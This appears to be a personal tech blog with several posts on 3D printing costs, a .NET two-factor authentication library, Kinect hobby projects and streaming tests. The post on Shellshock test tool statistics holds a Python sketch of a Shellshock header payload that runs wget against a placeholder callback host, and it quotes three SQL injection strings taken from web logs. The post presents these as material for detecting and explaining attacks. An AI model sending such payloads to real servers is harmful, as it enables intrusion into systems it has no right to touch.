3D Printer Shootout – Pro vs. Consumer

A few days ago, Scott Hanselman bought a $599 consumer 3D printer on Amazon. He then went on to share the next 16 hours' worth of elation, frustration, moments of success, and suicidal thoughts that go along with learning 3D printing on consumer hardware and open source tools.

My experience was even worse than his – as a company, we bought into the idea that $1000 worth of 3D printing machine should immediately bring us into the 3D manufacturing revolution. Months later, walking in on yet another night where the MakerBot printer had freaked out and spewed a massive tangle of spider-webby filament balls all over the floor, I was fully convinced that 3D printing, as a concept and industry, was a complete and useless pile of crap. We got 1 successful part for every 5 tries. We bought every kind of add-on available to heat up build plates, printed fan and enclosure mods, and some magic combination of painter's tape and AquaNet hair spray was the only thing that occasionally worked. Before writing it off altogether, we invested in the next level of equipment that held promise, and now work with a basic, professional-grade printer. We spent way more on payroll for someone to sit around and dink with the printer than we did on buying the professional printer. I made a rule that if anyone ever purchased any printer, part, or accessory from MakerBot again, they would be immediately terminated. That was 2 years ago.

With that said, I challenged Scott to a Pro vs. Consumer 3D printing shootout – our Stratasys uPrint vs. his Simple Metal, to see the good, the bad, and the ugly of each approach, and find out how we compare on each side of the spectrum. We gave it one shot, no do-overs, using only the printer and the software that came with it, for honest comparison.

This blog post represents our “Pro” side of the experience. Open Scott’s side in another tab and compare.

The Model

We each printed the same model from the same source – a coffee cup .STL from Thingiverse, available here. (For the uninitiated, a .STL file to a 3D printer is more or less like a .PDF to your laserjet office printer.) It’s not a super crazy shape, but at the same time requires a bit of support with curved surfaces – about what the “average” 3D print would be.

The Setup/Costs – Stratasys uPrint SE Pro

This is the bad news on our side – you get what you pay for. Stratasys makes the uPrint SE Pro as one of their entry level, professional grade models. It prints a single color at a time, with a single type of material (ABS). To duplicate our setup for this print, you would need the following:

uPrint SE Pro Printer and Dissolving Bath – about $22,000

1 Spool of Model Material (Black) – $205.00 (produces 42 cubic inches of printing)

1 Spool of Support Material – $200.00 (42 cubic inches worth)

Box of Build Plates – $125.00 for 24 (you need one for each print, so it costs about $5.20/each)

Soluble Concentrate – $149.00 for 12 bottles (dissolves support material, aka fancy drain-O)

Warranty Support – $2,000/year – because it does break from time to time.

Add a little bit of shipping, and for a mere $25K you’re ready to print your very own coffee cup.

Setting Up – Hardware

The good news is, all of our supplies come from the manufacturer of the printer – so the major plus on the “Pro” side is that everything works together.

First, we take a build plate out of the box.


They are plastic, with a textured surface that is magic: 3D material sticks to it once, and then the plate cannot be reused. If we are printing something small, we can sometimes use one corner of the build plate for one print and another corner later, but it just depends on the day.

The build plate snaps into place on a platform that is extremely solid – Stratasys seems to over-engineer their hardware, which is nice.


Next, printers need material, so we load both the model material (what our print will actually be made of), and the support material (what the printer uses as filler to support overhanging surfaces, and gets dissolved later).

It comes in a “space bag” and gets loaded into a cartridge.


Look closely – you see that little red thing?


That piece acts as a flow-meter for your material spool, and tracks how much material you have left.


Unfortunately, this is what I call the “DRM” of 3D printing. This little module makes sure that you are using a Stratasys material spool, and not material from other vendors. It’s one-way and cannot be “rewound”, so you can sometimes end up with a bit of material left over and the module thinks you’re already done, thus rendering the extra material unusable.

Aside from that, we load the spools, which is a matter of sliding them in and pressing “Load” on the printer panel.


Now we’re ready to do some printing!

I tried to get a great “action shot” timelapse of the print by taping a GoPro to the inside of the door. It’s a little tight in there, so I cut the handle off the build plate to make room for it.


That worked great until the printer heated up, the tape turned to goo and fell off, and the GoPro shut itself down at 125 degrees F. So I had to settle for a GoPro shot outside the door instead.


Setting Up – Software

With this type of printer, you work with Stratasys's "Catalyst" software. Again, everything just works together – no mucking around with configs and jumping through multiple tools, which is nice.

  1. Download the .STL from Thingiverse.
  2. Add the .STL to Catalyst.
  3. Press "Auto Orient" and "Add to Pack", progress bars fly and magic happens. (Really, the software is just calculating the most efficient way to print it – where the coffee cup needs supports and so forth.)
  4. Drag it to position it on the build plate where I want it to print.
  5. Send/queue the print to the printer.
  6. Hit the blinking "Start Model" button on the printer's front panel.


I hit print and walked away. The printer reports percent complete and time remaining (7 hours and 29 minutes), and the job can also be monitored in the Catalyst software.


The printer is very sensitive to interrupted airflow, so a magnetic latch engages and prevents us stupid humans from opening the door mid-print without the software's permission.

This print ultimately took 8 hours, 22 minutes, at 0.1mm resolution, used 4.84 cubic inches of model material, and 0.433 cubic inches of support material.


Out pops our 3D printed coffee cup!


You can see the model material (in black) and the support material (in white). The white has to go, so we dunk the whole thing in a hot bath.


The bath comes with, and is considered part of the printer. It’s a highly concentrated liquid (resembles Drain-O) mixed with water. We have to change it out every month or so. This unit heats up the liquid, and has a hot-tub style jet inside to keep a continuous flow of water over the part. We use big rubber gloves to prevent contact with this solution on bare skin.

All Done

We lift the container out of the bath, and what remains is our coffee cup and build plate without support material.


A quick rinse, and we’re ready for coffee.


Cost of a Coffee Cup

In direct costs, we used $23.62 in model material, $2.06 in support material, and a $5.20 build plate, for a total of $30.88. We have a fancy spreadsheet that calculates our total cost (printer cost over its lifespan, average reusable supplies based on our normal print volume), and our average cost per cubic inch of model printed is about $11.80. So if a customer asked us to print this coffee cup, it would run about $58.00.
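For the curious, the direct-cost math can be reproduced from the supply prices in the cost list earlier in this post (a quick sketch, nothing more):

```python
# Direct cost of this coffee cup print, from the supply prices listed above.
MODEL_SPOOL = 205.00    # dollars per spool, 42 cubic inches of model material
SUPPORT_SPOOL = 200.00  # dollars per spool, 42 cubic inches of support material
PLATE = 125.00 / 24     # single-use build plate, about $5.21 each

model_cost = 4.84 * (MODEL_SPOOL / 42)       # cubic inches used -> ~$23.62
support_cost = 0.433 * (SUPPORT_SPOOL / 42)  # -> ~$2.06
direct_cost = model_cost + support_cost + PLATE

print(round(direct_cost, 2))  # ~30.89 (rounding each line item first gives the $30.88 above)
```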

On to Scott for the conclusion…

What does the end-result look like in cost/value/process? Was Scott able to print it in one shot without drama, or did 3D printer parts and a tangled mess of open-source bits come flying out of the nearest window in a fit of rage? How close are consumer printers to competing with professional printers in ultimate time and value?

We shipped Scott our version of the coffee cup, and he tallied the final scores. See what he had to say…


Some stats from ShellShock test tool analysis

It’s been an interesting past few days. As you can probably tell from the counters at http://shellshock.brandonpotter.com, the vulnerability test tool logs some statistical information.

When the tool sends an HTTP request, it contains a special URL that, if successful, lets us know that the bash command was executed on the remote system, and which type of HTTP header embed succeeded in executing the command.
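The tool's exact payload isn't published here, but a Shellshock header test generally has the shape sketched below – the callback URL and test ID are placeholders, not the tool's real endpoint:

```python
# Illustrative shape of a Shellshock (CVE-2014-6271) test request. The
# "() { :;};" prefix abuses bash's function-import parsing; anything after it
# runs as a command if a CGI script exports the header into a vulnerable bash.
payload = "() { :;}; /usr/bin/wget http://example.com/callback/UNIQUE-TEST-ID"

# The same payload is tried in each of the three headers discussed below.
headers = {
    "Cookie": payload,
    "Referer": payload,
    "User-Agent": payload,
}

for name, value in headers.items():
    print(f"{name}: {value}")
```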

At the time of this post, a little over 121,000 tests have been run, representing approximately 88,000 unique hosts. The vast majority of systems have not been affected in a way that this tool detects. Last week, it was around 8% of systems, and as of today that number has dropped closer to 6% and continues to drop. Here is the breakdown of vulnerabilities that the tool has found:

  • 35% – Cookie Attack – These sites were susceptible to a bash command embedded in a Cookie HTTP header.
  • 33% – Referer Attack – Bash command embedded in a Referer HTTP header.
  • 32% – User-Agent Attack – Bash command embedded in a User-Agent header.

So, it’s roughly evenly distributed across HTTP headers, but Cookie is the most vulnerable by a few points.

The test tool also uses a few different commands, since it depends on wget or curl and these may be located in different locations. /usr/bin/wget is by far the most successful, with 52% of the vulnerabilities identified through it. (Not that this matters, since most intentional attacks would likely focus on doing something a little more evil than wget’ing a URL, but it has been interesting to see which worked.)

Note: Keep in mind that this is an HTTP test tool only, and while HTTP is the easiest and most open attack point to your servers, it is not necessarily the only way this can be exploited if you didn't patch. For the test tool to find a vulnerability, you must have a vulnerable Bash shell, in addition to a CGI script / environment running on your web server that calls Bash to do something.

On a different, more mildly interesting note of how folks are testing their junk…

There is a disclaimer that the test tool should only be used on your own sites. Of the crazy people, the misfits, the rebels, the troublemakers:

  • 695 people have tested google.com – fear not, they have things under control over there now.
  • 259 people have tested facebook.com – uncle Mark would be proud.
  • 155 people have tested shellshock.brandonpotter.com (y’all think you’re funny)
  • 75 people have tested (again this is why we can’t have nice things)

A few of the popular sites have been blocked now, since it’s just a waste of resources at this point testing them over and over. I’m no fun.

Looking through the web logs, honorable mention goes to the good people testing these “sites”…

  • -1 or 1=1 and (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  • 1′ || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ‘
  • (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)

Implementing Free Two-Factor Authentication in .NET using Google Authenticator

Username/password combinations don't cut it anymore, and two-factor authentication is a great way to help secure user accounts. If you have an account with a system that supports it, you should be using it. Likewise, if you develop systems that require users to log in with a username and password, you should be offering it. By using two-factor authentication, you dramatically reduce the attack surface – no longer would a nefarious individual have to just guess your password; they would have to guess your password AND a PIN that changes every 30 seconds.

We are in the middle of adding two-factor auth to a few of our own systems. There are a few sites (like Authy) that will operate this as a cloud service for you at a monthly or usage cost, but there's no need. Google offers a completely free solution via the Google Authenticator app for iOS and Android, with an equivalent app just called 'Authenticator' for Windows Phone. I was surprised there were no really good .NET libraries for implementing this method of two-factor authentication. So, I made one.

What is two-factor authentication?

Two-factor authentication, as the name implies, requires users to supply normal credentials (a username and password, for example), but adds a second, real-time token to the login to verify the user’s identity.

Old-School Tokens


You may have seen these RSA SecurID tokens floating around in enterprise IT departments. They have been around forever, but have normally been a pain to implement and support.

Text Tokens

Some forms of two-factor authentication will text you a one-time unique token when needed. And that is fairly easy to implement. However, text tokens have a few drawbacks:

  • Not everyone is within cell carrier service all the time
  • Text costs can still be prohibitive (when traveling internationally, for example)
  • Sending true text/SMS messages costs money, through services like Twilio

Two-Factor Apps

Fortunately, this problem is easily solved by apps, and Google Authenticator and its similar alternatives are my pick.

There are others, but that should cover most users pretty well.

The workflow on this is straightforward, and can be used offline – tokens are algorithm-generated, and do not require a live internet connection on the user’s device.

  1. Your system/web site/app generates a two-factor token for the user. Perhaps a GUID, or any unique identifier string specific to that user.
  2. You give the user a code to add to the Google Authenticator app, or show them a QR code to scan for the easy way.
  3. Google Authenticator then generates a 6-digit PIN code every 30 seconds. Prompt the user for this code during their login, and validate it!
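Under the hood, step 3 is the TOTP algorithm (RFC 6238): an HMAC-SHA1 over the number of 30-second intervals since the Unix epoch, truncated to a 6-digit code. Here's a minimal Python sketch of the idea – illustrative only, since Google Authenticator takes the shared secret Base32-encoded while this sketch hashes the raw ASCII key directly:

```python
import hashlib
import hmac
import struct
import time

def totp(secret, timestamp=None, step=30):
    """Sketch of TOTP (RFC 6238): derive a 6-digit PIN from a shared secret
    and the current 30-second time step."""
    if timestamp is None:
        timestamp = time.time()
    counter = int(timestamp) // step                   # 30-second interval count
    msg = struct.pack(">Q", counter)                   # 8-byte big-endian counter
    digest = hmac.new(secret.encode(), msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                         # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 1_000_000:06d}"
```

Both sides compute the same function from the same secret, so as long as the clocks roughly agree, the PINs match – no network connection needed on the device.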

It looks like this on iPhone:


Try it out!

Go get the app and give it a try to see how it works – I set up a sample workflow here: http://GAuthTwoFactorSample.azurewebsites.net

Scan the QR code into Google Authenticator, and then try validating your PIN code.

Now, on to implementation…

This is supposed to be easy, so start by grabbing the NuGet package GoogleAuthenticator (here’s a link).


Present User Setup QR Code / Manual Entry Code with GenerateSetupCode

Users have two options when setting up a new Google Authenticator account. If using a mobile device, they can scan a QR code (easiest), or they can enter or copy/paste a manual code into the app.

Generating this information takes a couple lines of code:

TwoFactorAuthenticator tfa = new TwoFactorAuthenticator();
var setupInfo = tfa.GenerateSetupCode("MyApp", "user@example.com", "SuperSecretKeyGoesHere", 300, 300);

string qrCodeImageUrl = setupInfo.QrCodeSetupImageUrl;
string manualEntrySetupCode = setupInfo.ManualEntryKey;

GenerateSetupCode takes a few arguments:

  1. Issuer ID – this is the issuer ID that will appear on the user’s Google Authenticator app, right above the code. It should be the name of your app/system so the user can easily identify it.
  2. Account Title – this will be displayed to the user in the Google Authenticator app. It cannot have any spaces (if it does, the library will filter them). The user’s e-mail address is appropriate to use here, if that works for your system.
  3. Account Secret Key – this is the unique user key that only your system knows about. A good length for this is 10-12 characters. Don’t show this to the user! Your users should never see it. I exposed it on the demo site just to show what’s going on.
  4. QR Code Width – width (in pixels) of generated QR code image
  5. QR Code Height – height (in pixels) of generated QR code image

It returns an object with a few notable properties:

  1. QrCodeSetupImageUrl – the URL to the QR code image that the user can scan (powered by Google Charts)
  2. ManualEntryKey – if the user can’t scan the QR code, this is the string they will need to enter into Google Authenticator in order to set up the two-factor account.
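For reference, the QR code itself just encodes a standard "Key Uri Format" string – roughly the sketch below (an assumption about the general format; exact field handling can vary by library):

```python
import base64
from urllib.parse import quote

def setup_uri(issuer, account, secret_ascii):
    """Sketch of the otpauth:// URI a Google Authenticator QR code encodes.
    The shared secret travels Base32-encoded; issuer and account form the label."""
    secret_b32 = base64.b32encode(secret_ascii.encode()).decode().rstrip("=")
    return (f"otpauth://totp/{quote(issuer)}:{quote(account)}"
            f"?secret={secret_b32}&issuer={quote(issuer)}")

print(setup_uri("MyApp", "user@example.com", "SuperSecretKeyGoesHere"))
```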

Validate a user’s PIN with ValidateTwoFactorPIN

Prompt the user for their current PIN displayed in Google Authenticator, and validate it:

TwoFactorAuthenticator tfa = new TwoFactorAuthenticator();
bool isCorrectPIN = tfa.ValidateTwoFactorPIN("SuperSecretKeyGoesHere", "123456");

That’s it!

About Clock Drift

Given that this two-factor authentication method is time-based, it is highly likely that there is some time difference between your servers and the user’s device. With these PIN codes changing every 30 seconds, you must decide what an acceptable ‘clock drift’ might be. Using the above code samples, the library will default to a clock drift tolerance of +/- 5 minutes from the current time. This means that if your user’s device is perfectly in sync with the server time, their PIN code will be ‘correct’ for a 10-minute window of time. However, if their device time is more than +/- 5 minutes off from your server’s time, the PIN code displayed on their device will never match up.

If you want to change this default clock drift tolerance, you can use the overloaded version of ValidateTwoFactorPIN, and provide a TimeSpan.
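The library's internals aren't shown here, but a drift tolerance amounts to checking the submitted PIN against every 30-second step inside the window. A self-contained Python sketch of the idea (illustrative, not the library's actual code):

```python
import hashlib
import hmac
import struct
import time

def totp_at(secret, timestamp):
    """Illustrative TOTP value (RFC 6238) for the 30-second step containing timestamp."""
    msg = struct.pack(">Q", int(timestamp) // 30)
    digest = hmac.new(secret.encode(), msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 1_000_000:06d}"

def validate_with_drift(secret, pin, drift_seconds=300, now=None):
    """Accept the PIN if it matches any 30-second step within +/- drift_seconds."""
    if now is None:
        now = int(time.time())
    candidates = range(now - drift_seconds, now + drift_seconds + 1, 30)
    return any(totp_at(secret, t) == pin for t in candidates)
```

A wider window is friendlier to devices with bad clocks, but it also lengthens how long any single PIN stays valid – hence the trade-off the default +/- 5 minutes represents.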

That’s all – hope this library is useful and makes two-factor authentication a no-brainer.

Windows 8 Setup: Setup has failed to apply migration data

I imagine there are a lot of ways a Migration installation on Win 8 could fail, but just to share my fix…

I did a Windows 8 upgrade from Windows 7, and about 30% into the Migration phase, I hit this error:

Setup has failed to apply migration data.

… Followed by a rollback to Windows 7.

This error tells you nothing – very frustrating. Look in the logs located in C:\$WINDOWS.~BT\Sources (surf around in there and you’ll find the log file that applies, possibly in the \Migration folder).

In my case, I noticed an entry that pointed to a Migration Error – it couldn’t move my desktop.ini file in my Music folder. It was looking for C:\Users\bpotter\Music\desktop.ini and couldn’t find it, failed the migration, and triggered a rollback.

I deleted the desktop.ini file (I don’t really care if I lose the folder view settings for my Music folder) and the install and migration completed successfully.

Behind the Scenes with the Kinect Train Build

It’s been a little while since the last Christmas project, so it was time to do something again.

This year, I started out with the following criteria for the Christmas for the City display:

  • Something interactive
  • Something that gets more fun as more people join in
  • Something that lets groups of people compete


The weekend before, my wife came home with a Nestle model train she got at a toy sale for $20:


This was great – trains and Christmas go together, and if the train could be driven by some input, we'd have the beginning of an interactive display. My plan at this point was to mount a series of industrial buttons and wire them to a Netduino. The faster the kids pushed the buttons, the faster the train would go.

However, I was running a little low on time at this point, so I needed something a little simpler. I was thinking of what might be possible while I was watching TV, and noticed my Kinect sitting under the TV. That was perfect. The more motion in front of the depth camera, the faster the train goes.

Measuring Motion

Using the Kinect library, I wrote a small app that grabbed each camera frame and passed it into an AForge.NET motion detection library. This gave me a motion analysis similar to this picture, where red areas represent “things that have moved in the last second or so”.


By counting the number of "motion pixels" each second, I ended up with what I coined the "motion number". This could be anywhere from 0 to around 600,000 depending on how much motion was happening. I translated this into a percentage based on the max value seen since application start. So now we have a "motion percentage" from 0-100%. This more or less serves as the value we need for the train throttle.
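The scaling step works like the sketch below (a Python illustration of the approach, not the original C# app):

```python
class MotionThrottle:
    """Convert raw per-second 'motion numbers' (counts of changed pixels)
    into a 0-100% throttle, scaled by the largest value seen since start."""

    def __init__(self):
        self.max_seen = 0

    def percentage(self, motion_pixels):
        # The running maximum defines what "100%" means so far.
        self.max_seen = max(self.max_seen, motion_pixels)
        if self.max_seen == 0:
            return 0.0
        return 100.0 * motion_pixels / self.max_seen

throttle = MotionThrottle()
print(throttle.percentage(150_000))  # first reading sets the max: 100.0
print(throttle.percentage(75_000))   # half of the peak so far: 50.0
```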

Mounting the Train

Trains, sensitive electronics, and anything else not bolted down or secured don’t last very long in front of kids, so in order to keep the train from being kicked, shoved, punched, or stolen, it needed some kind of enclosure.


For this I used some Bosch aluminum profiles – this stuff is amazing, we use it for just about everything. The awesome distributor we use at work fabbed/cut the pieces for me in a day, and then it was off to the assembly area – the area between the couch and the dining room table. 😉


This is also the point where I found out our new puppy hates portable drills..


OK, so one problem.

I set up the Nestle train and… it didn’t work. Either the engine or the controller didn’t work. Still not sure what the issue was, but I had come too far now to abandon this one.

This was Saturday. I had the rest of the night and Sunday to finish this thing. I called The Train Loft in Winston-Salem Saturday evening. They were closing in 15 mins but Jeff stayed late so I could come get another train. They had an amazing display – not something I was going to attempt:


Anyway, Jeff hooked me up with a Polar Express train set, and tricked out the track a little bit with a figure-8 instead of just the oval. The project was officially over-budget at that point, but hey, Polar Express and Christmas go together, right?

Controlling the Train Throttle

What I thought was the easy part actually became the hardest. Turns out that train voltage is weird in a lot of ways (this train used AC, not DC), and controlling it via a computer is not that easy. I looked at various options for this, even trying to use an AC dimmer limited in software so as not to overload the train. This got risky quickly, so I opted for a simpler mechanical control on the actual train controller. I pulled out the Lego Mindstorms NXT programmable controller and modified the train controller handle to attach to the NXT…

The before:


The after:


While it looked cool, the "conveyor track" had a lot of slippage in it. I had to modify it further to couple the servo motor directly to the controller, and then I was in business.


Making it into a Game

So, now I had a “motion percentage” to use as a throttle value, a way to control the train via software, and a mounting rig.

Now, I just had to make it into a game. So I wrote an app with this workflow:

  • Plays a Polar Express intro clip with the instructions (“move your body to make the train go”)
  • Gives a 3, 2, 1 countdown
  • For 30 seconds, enables the Kinect, plays a Polar Express theme song while the train runs, displays the "motion percentage" on a 0-400 mph scale (yes, not really to scale, but hey…), and displays the "distance traveled" by the train
  • After 30 seconds, stop train and display high scores (how far the train went in the 30 seconds)
  • Repeat
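The speedometer and score are simple transforms of the motion percentage – something like this sketch (the 4x scale factor and one-sample-per-second assumption are mine, for illustration):

```python
def speed_mph(motion_pct):
    """Map the 0-100% motion percentage onto the display's 0-400 mph scale."""
    return 4.0 * motion_pct

def distance_score(motion_samples_per_second):
    """'Distance traveled' over the 30-second round: integrate the displayed
    speed (mph) over one-second samples, converting seconds to hours."""
    return sum(speed_mph(p) for p in motion_samples_per_second) / 3600.0
```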


I wrapped all that up, and our awesome Christmas for the City volunteers helped set up the rig at the convention center. Here are some pics of what it looked like:





Overall, this worked out great. It was a self-contained rig, running one "round" every minute or so most of the time. Kids participated in nearly every round of the 6-hour event. We had groups of kids competing, groups of adults competing, a few "die-hards" with sweat pouring down their faces, and most of all a ton of smiles.

One of my favorite parts of the night was when one kid came over and played a few rounds, and then went to see Santa across the room and asked him for “a Polar Express dance game just like that one”.

All in all, I think I achieved the initial objectives, and combined some great hardware components together in a short amount of time!

Testing how Smooth Streaming chokes

Just for fun, I tested Big Buck Bunny being served through IIS Media Services from the local disk, running on an Amazon EC2 Micro instance (the smallest available). This is a fairly lightweight server, i.e. something you would never want to run in a production environment. Consider this the streaming equivalent of “Will it Blend?”…

The results are in – when it’s going well, it’s surprisingly great, and when it’s not going well, it’s terrible. 😉

Total Chunks: 2691
Chunks Tested: 2691
Manifest Download Time: 310ms
Avg Video Chunk Response Time: 357ms
Avg Audio Chunk Response Time: 61ms

Excellent Chunks: 590 (21.92%)
Good Chunks: 1821 (67.67%)

Warning Chunks: 68 (2.53%)
Degraded Chunks: 6 (0.22%)
Poor Chunks: 206 (7.66%)

Stream 0: video, 2962kbps, 2056kbps, 1427kbps, 991kbps, 688kbps, 477kbps, 331kbps, 230kbps
Stream 1: audio, 128kbps

Things go OK around 89% of the time. But when they don’t, it crashes and burns…


Yikes. You can almost feel the Silverlight players freaking out. 😉

IIS Smooth Streaming Performance Testing Tool

If you are deploying a Smooth Streaming infrastructure, you already know it’s all HTTP-based. Requests for little video chunks hit your web server, and your web server looks up the correct video “chunk” within the audio/video file and serves it up.

However, it can be difficult to get a good benchmark on how your infrastructure is doing at serving up chunks, especially when your Silverlight clients are seeing random buffering errors or you run into scaling problems.

First off, there is a lot of information available from the Smooth Streaming Health Monitor app – in a couple of seconds you can have a trace of the decisions the Silverlight Adaptive Streaming Media Element is making, and export it to Excel.

But when you just need comprehensive chunk data on all bitrates to diagnose how your origin/CDN is doing, I made this app (almost called it “Chunker”):


Enter the manifest URL of the on-demand smooth stream you want to test (note that this does not currently support live or composite manifests), for example: http://server.com/streams/BigBuckBunny.ism/Manifest

Once you click Begin Test, a new test tab will open and start requesting chunks based on the manifest information. The results will tell you if you may have a problem with your disk IO on your origin or some other problem preventing chunks being delivered in a timely manner.

Note: Only the first 1000 bytes (almost 1K) of each chunk is downloaded. The point here is not to test bandwidth, but rather test your infrastructure’s performance as it relates to reading/seeking fragments and assembling chunks.
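The measurement itself boils down to the sketch below: time to the first ~1000 bytes of a chunk, which captures seek/assembly latency rather than bandwidth (the fragment URL shape in the comment is an assumption based on typical Smooth Streaming URLs, not the tool's code):

```python
import time
import urllib.request

def time_chunk(url, nbytes=1000):
    """Request a chunk but read only the first `nbytes`, returning elapsed
    milliseconds. A fragment URL typically looks something like:
    http://server.com/streams/BigBuckBunny.ism/QualityLevels(2962000)/Fragments(video=0)
    (illustrative shape only)."""
    start = time.monotonic()
    with urllib.request.urlopen(url) as resp:
        resp.read(nbytes)  # stop early: measure time-to-first-bytes, not throughput
    return (time.monotonic() - start) * 1000.0
```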

Hopefully based on the assessment of each chunk, you can get an idea of how your CDN / origin / standalone box is doing at delivering chunks.

Run Smooth Stream Performance Testing Tool (ClickOnce)

Visual Studio tip: Turn off #region when generating interface code

I've gotten to the point where I don't like #region tags in code – they're what you use when you need to sweep some code under the rug.

As such, it’s really annoying to me when implementing an interface and VS generates nice #region tags all the time.

Props to this StackOverflow question/answer for the solution.

Tools > Options > Text Editor > C# > Advanced > uncheck “Surround generated code with #region”.


Punished for not installing a toolbar!

This was a new one… I thought having to avoid toolbars bundled with the application I actually wanted was punishment enough, but here's a new twist: when I unchecked "Install the new Bing Bar", the Next button actually turned into a disabled 30-second countdown!


I guess this is a new technique… Punish with Patience. 😉

Dear Adobe: This is NOT okay

According to RIAStats.com, Adobe Flash is installed on over 96% of computers.

That's why I was astonished at the most recent Flash update, to 10.1. This morning, via the latest Firefox update, I was prompted to update Flash because of a security issue. No problem – however, this was the first clue that Adobe was starting to abuse its place as a popular browser plugin:


See that? By default, “Include in your download” – McAfee Security Scan Plus. I’ve used McAfee. I’m not fond of their software. I don’t want it. I just want Flash. No problem… I unchecked “Include in your download” and downloaded Flash player.

So then I downloaded the Adobe Download Manager (let’s not get into the pet peeve of downloading a downloader), and to my surprise:


Flash Player at least asked me to accept the license terms. McAfee Security Scan Plus, however, downloaded and installed automatically even though I had specifically unchecked that option – quickly, and with no confirmation. Almost like they knew I would say no if given the chance.


So Adobe, here’s my list of grievances:

  1. Attempting to include third-party software by default, especially when it isn’t related to what I actually want (and you know that), is unethical.
  2. Browser plugin runtimes are to be treated as sacred. We as developers use them to bring great experiences to the web, and in turn, get users to install your product. It is imperative that our users trust your runtime. You have disrespected us, disrespected the users we serve, and destroyed that trust by making such a move.
  3. Waiting until version 10 and 96% browser plugin market penetration to do this is unacceptable. Being the #1 rich content plugin comes with an industry-wide responsibility.
  4. Including the download anyway, when I specifically unchecked the option, turns a previously respected Flash runtime into malware.

Please reconsider this delivery model. This is not about Flash in particular, but it is about users being able to trust the applications we deliver to them. The more we leave users with a bad taste in their mouths after updates, the less they’ll update… and that ultimately hurts us all.